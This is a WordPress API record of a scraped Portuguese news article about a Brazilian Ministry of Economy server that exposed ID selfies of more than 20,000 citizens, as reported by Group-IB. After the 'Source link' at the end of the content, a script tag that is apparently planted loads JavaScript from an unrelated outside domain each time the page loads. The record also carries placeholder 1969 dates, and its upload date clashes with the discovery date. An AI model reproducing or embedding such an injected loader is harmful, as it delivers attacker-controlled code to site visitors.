{"id":1809,"date":"1969-12-31T21:00:00","date_gmt":"1970-01-01T00:00:00","guid":{"rendered":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/falha-no-ministerio-da-economia-expos-milhares-de-dados-incluindo-rgs\/"},"modified":"1969-12-31T21:00:00","modified_gmt":"1970-01-01T00:00:00","slug":"falha-no-ministerio-da-economia-expos-milhares-de-dados-incluindo-rgs","status":"publish","type":"post","link":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/falha-no-ministerio-da-economia-expos-milhares-de-dados-incluindo-rgs\/","title":{"rendered":"Falha no Minist\u00e9rio da Economia exp\u00f4s milhares de dados, incluindo RGs"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p>Uma falha de ciberseguran\u00e7a em um servidor do Minist\u00e9rio da Economia deixou expostos dados de mais de 20 mil brasileiros. O caso foi descoberto em janeiro de 2021 e est\u00e1 em um <a href=\"https:\/\/bit.ly\/3zAu7X8.\" target=\"_blank\" rel=\"noopener\">relat\u00f3rio da unidade de intelig\u00eancia e amea\u00e7as do Group-IB<\/a>, empresa de ciberseguran\u00e7a com sede em Cingapura e com parcerias com \u00f3rg\u00e3os de investiga\u00e7\u00e3o, como Interpol.<\/p>\n<p><strong>Tilt<\/strong> conseguiu acesso ao <a href=\"https:\/\/blog.group-ib.com\/brazil-exposed-db?utm_source=UOL&amp;utm_campaign=brazil-database&amp;utm_medium=social\" target=\"_blank\" rel=\"noopener\">documento<\/a> com exclusividade. De acordo com o relat\u00f3rio, foram expostas selfies de pessoas segurando a carteira de identidade e de habilita\u00e7\u00e3o. Esse procedimento \u00e9 usado quando algum comando de cadastro solicita que o internauta comprove a sua identidade.<\/p>\n<div class=\"photoembed-wrapper\">\n<figure class=\"photo photo-embed no-gutter col-sm-24  crop-750x421 limit-crop  figure\" style=\"max-width:750px\" data-format=\"horizontal\">\n<div class=\"image bg\">\n<div class=\"placeholder\" style=\"max-width:750px\">   <img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/conteudo.imguol.com.br\/c\/noticias\/79\/2022\/06\/14\/milhares-de-selfies-de-brasileiros-estiveram-expostas-diz-group-ib-1655213071735_v2_750x421.jpg\" class=\"pinit-img\" alt=\"Milhares de selfies de brasileiros estiveram expostas, diz Group-IB - Divulga\u00e7\u00e3o\/Group-IB - Divulga\u00e7\u00e3o\/Group-IB\" data-crop=\"{&quot;xs&quot;:&quot;450x253&quot;,&quot;sm&quot;:&quot;750x421&quot;,&quot;md&quot;:&quot;600x337&quot;,&quot;lg&quot;:&quot;750x421&quot;}\" width=\"750\" height=\"421\"\/>  <i class=\"placeholder-mask\" style=\"padding-bottom: 56.13333333333333%\"\/><\/div>\n<\/div><figcaption class=\"container bottom-title\">\n<p>Milhares de selfies de brasileiros estiveram expostas, diz Group-IB<\/p>\n<p> <span>Imagem: Divulga\u00e7\u00e3o\/Group-IB<\/span><\/figcaption><\/figure>\n<\/div>\n<p>O caso foi descoberto em janeiro de 2021, mas os analistas do Group-IB acreditam que as credenciais estavam expostas havia pelo menos dois meses. A verifica\u00e7\u00e3o n\u00e3o conseguiu identificar se a falha seria resultado de viola\u00e7\u00e3o ou vazamento proposital, mas os dados acabaram sendo retirados do ar ap\u00f3s o governo federal ser avisado pela empresa.<\/p>\n<p>As fotos dos cidad\u00e3os sa\u00edram do ar dez horas depois do comunicado enviado pela empresa de Cingapura, que entrou em contato com o CTIR Gov (Centro de Preven\u00e7\u00e3o, Tratamento e Resposta a Incidentes Cibern\u00e9ticos de Governo), departamento vinculado ao GSI (Gabinete de Seguran\u00e7a Institucional), comandado pelo general Augusto Heleno, no Pal\u00e1cio do Planalto.<\/p>\n<p><strong>Tilt<\/strong> procurou o GSI para comentar a falha de ciberseguran\u00e7a que exp\u00f4s mais de 20 mil brasileiros, mas ainda n\u00e3o obteve retorno.<\/p>\n<p>O Minist\u00e9rio da Economia informou &#8220;que municiou as investiga\u00e7\u00f5es da Pol\u00edcia Federal sobre o ataque cibern\u00e9tico e criminoso, no come\u00e7o deste ano, contra empresa contratada por licita\u00e7\u00e3o para atender a chamados feitos ao \u00f3rg\u00e3o&#8221;. A pasta tamb\u00e9m disse que &#8220;da apura\u00e7\u00e3o, podem resultar inclusive san\u00e7\u00f5es \u00e0 empresa contratada&#8221; e que, &#8220;na \u00e9poca, o minist\u00e9rio ainda comunicou todos os demais \u00f3rg\u00e3os competentes para tomarem as medidas adequadas&#8221;.<\/p>\n<p><cite>Nosso primeiro pensamento foi: &#8216;uau, algu\u00e9m esqueceu um diret\u00f3rio de 55 GB com dados confidenciais em um servidor dispon\u00edvel publicamente&#8217;. N\u00e3o t\u00ednhamos ideia de quem esse servidor pertencia, mas parecia haver pessoas reais segurando suas identifica\u00e7\u00f5es nas fotos de selfie para fins de verifica\u00e7\u00e3o.<\/cite> <strong>Anastasia <span>Tikhonova<\/span>, chefe de pesquisa avan\u00e7ada de amea\u00e7as persistentes da equipe de intelig\u00eancia de amea\u00e7as do <span>Group-IB<\/span>.<\/strong><\/p>\n<p>&#8220;A \u00fanica coisa certa a fazer era entrar em contato com as autoridades competentes para que eles pudessem tomar as a\u00e7\u00f5es necess\u00e1rias para mitigar os riscos&#8221;, acrescentou.<\/p>\n<h2>Como a falha foi descoberta<\/h2>\n<p>De acordo com a empresa, o caso brasileiro apareceu no radar das equipes durante os processos de rotina de coleta de intelig\u00eancia e amea\u00e7as do Group-IB na internet.<\/p>\n<p>A descoberta aconteceu em 8 de janeiro de 2021. A empresa verificou uma listagem de servi\u00e7os de diret\u00f3rios e acabou constatando a falha.<\/p>\n<p>Os analistas de seguran\u00e7a do Group-IB acreditam que os dados se tornaram p\u00fablicos ap\u00f3s o servidor de diret\u00f3rio n\u00e3o ser desabilitado pelo governo brasileiro. O servidor de diret\u00f3rio \u00e9 uma esp\u00e9cie de infraestrutura de informa\u00e7\u00e3o que armazena e compartilha dados comuns em rede, geralmente usadas em grandes organiza\u00e7\u00f5es ou \u00f3rg\u00e3os p\u00fablicos, que possuem v\u00e1rios computadores interligados em uma mesma teia.<\/p>\n<div class=\"photoembed-wrapper\">\n<figure class=\"photo photo-embed no-gutter col-sm-24  crop-750x421 limit-crop  figure\" style=\"max-width:750px\" data-format=\"horizontal\">\n<div class=\"image bg\">\n<div class=\"placeholder\" style=\"max-width:750px\">   <img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/conteudo.imguol.com.br\/c\/noticias\/79\/2022\/06\/14\/dados-estavam-em-servidor-de-diretorio-do-site-do-ministerio-da-economia-1655212516958_v2_750x421.jpg\" class=\"pinit-img\" alt=\"Dados estavam em servidor de diret\u00f3rio do site do Minist\u00e9rio da Economia - Divulga\u00e7\u00e3o\/Group-IB - Divulga\u00e7\u00e3o\/Group-IB\" data-crop=\"{&quot;xs&quot;:&quot;450x253&quot;,&quot;sm&quot;:&quot;750x421&quot;,&quot;md&quot;:&quot;600x337&quot;,&quot;lg&quot;:&quot;750x421&quot;}\" width=\"750\" height=\"421\"\/>  <i class=\"placeholder-mask\" style=\"padding-bottom: 56.13333333333333%\"\/><\/div>\n<\/div><figcaption class=\"container bottom-title\">\n<p>Dados estavam em servidor de diret\u00f3rio do site do Minist\u00e9rio da Economia<\/p>\n<p> <span>Imagem: Divulga\u00e7\u00e3o\/Group-IB<\/span><\/figcaption><\/figure>\n<\/div>\n<p>&#8220;Desabilitar a listagem de diret\u00f3rios em um servidor web \u00e9 uma precau\u00e7\u00e3o de seguran\u00e7a normal para evitar a exposi\u00e7\u00e3o de informa\u00e7\u00f5es confidenciais. No entanto, este n\u00e3o foi o caso. Qualquer pessoa na internet poderia acessar o conte\u00fado do servidor&#8221;, escreveu a empresa no relat\u00f3rio.<\/p>\n<p>O arquivo com as selfies estava zipado, al\u00e9m de ainda compor um script escrito em Python (software de programa\u00e7\u00e3o) e uma ferramenta de c\u00f3digo aberto. Os analistas deduzem que, pela \u00faltima data de modifica\u00e7\u00e3o, tudo acabou sendo carregado em novembro de 2021.<\/p>\n<p>J\u00e1 atrav\u00e9s de um script de crawler, que \u00e9 um algoritmo para analisar o c\u00f3digo de um site, verificou-se que o arquivo estava vinculado ao seguinte endere\u00e7o: https:\/\/portaldeservicos.economia.gov.br\/.<\/p>\n<p>A suspeita da empresa \u00e9 de que os dados tenham sido violados por terceiros que se aproveitaram de uma falha de ciberseguran\u00e7a do governo brasileiro, e n\u00e3o por funcion\u00e1rios p\u00fablicos.<\/p>\n<p>Uma troca de emails exposta no relat\u00f3rio mostra que o governo brasileiro respondeu ao alerta da empresa \u00e0s 16h56 de 12 de janeiro de 2021 e retornou outra vez no mesmo dia, \u00e0s 20h40, informando que o problema estaria resolvido. Os especialistas confirmaram que o arquivo aparentemente j\u00e1 estava fora do ar.<\/p>\n<p>&#8220;Dadas todas as evid\u00eancias acima, \u00e9 justo supor que o servidor parece ter sido usado por um terceiro autorizado como uma \u00e1rea de teste enquanto eles coletavam informa\u00e7\u00f5es pessoais confidenciais com inten\u00e7\u00e3o pouco clara, mas provavelmente maliciosa. No entanto, n\u00e3o est\u00e1 claro qual era o objetivo final da parte que coletou dados confidenciais&#8221;, concluiu no relat\u00f3rio.<\/p>\n<h2>Brasil \u00e9 reincidente neste tipo de caso<\/h2>\n<p>N\u00e3o \u00e9 a primeira vez que falhas de ciberseguran\u00e7a exp\u00f5em os brasileiros. <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2021\/07\/31\/vazamento-expoe-13-mil-fotos-de-documentos-e-dados-de-227-mi-de-brasileiros.htm\">Uma das maiores registradas at\u00e9 agora ocorreu em agosto de 2021<\/a>, quando foi revelado que 227 milh\u00f5es de brasileiros tiveram algum tipo de dado confidencial vazado.<\/p>\n<p>Na ocasi\u00e3o, o arquivo era vendido em f\u00f3runs an\u00f4nimos por US$ 300.<\/p>\n<p>De acordo com o Group-IB, os dados podem ser usados por criminosos para as seguintes pr\u00e1ticas:<\/p>\n<ul>\n<li>Roubo de identidade<\/li>\n<li>Controle de conta<\/li>\n<li>Extors\u00e3o<\/li>\n<li>Ataques de Spear Phishing<\/li>\n<li>Roubo de dinheiro<\/li>\n<\/ul>\n<p>J\u00e1 empresas e organiza\u00e7\u00f5es de governo podem sofrer:<\/p>\n<ul>\n<li>Perda financeira<\/li>\n<li>A\u00e7\u00e3o legal<\/li>\n<li>Danos \u00e0 reputa\u00e7\u00e3o<\/li>\n<li>Tempo de inatividade operacional<\/li>\n<li>Custos de resposta e recupera\u00e7\u00e3o<\/li>\n<li>An\u00fancios de divulga\u00e7\u00e3o se houver uma viola\u00e7\u00e3o<\/li>\n<\/ul><\/div>\n<p><br \/>\n<br \/><a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2022\/06\/16\/dados-ministerio-economia-selfies-cidadao-brasileiros-expostos-internet.htm\">Source link <\/a><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Uma falha de ciberseguran\u00e7a em um servidor do Minist\u00e9rio da Economia deixou expostos dados de mais de 20 mil brasileiros. O caso foi descoberto em janeiro de 2021 e est\u00e1 em um relat\u00f3rio da unidade de intelig\u00eancia e amea\u00e7as do Group-IB, empresa de ciberseguran\u00e7a com sede em Cingapura e com parcerias com \u00f3rg\u00e3os de investiga\u00e7\u00e3o,&#8230;<\/p>\n","protected":false},"author":1,"featured_media":1810,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_kad_post_transparent":"","_kad_post_title":"","_kad_post_layout":"","_kad_post_sidebar_id":"","_kad_post_content_style":"","_kad_post_vertical_padding":"","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"footnotes":""},"categories":[1],"tags":[703,2280,3345,1165,3346,2083,3344,3347],"class_list":["post-1809","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sem-categoria","tag-dados","tag-economia","tag-expos","tag-falha","tag-incluindo","tag-milhares","tag-ministerio","tag-rgs"],"_links":{"self":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/1809","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/comments?post=1809"}],"version-history":[{"count":0,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/1809\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media\/1810"}],"wp:attachment":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media?parent=1809"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/categories?post=1809"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/tags?post=1809"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}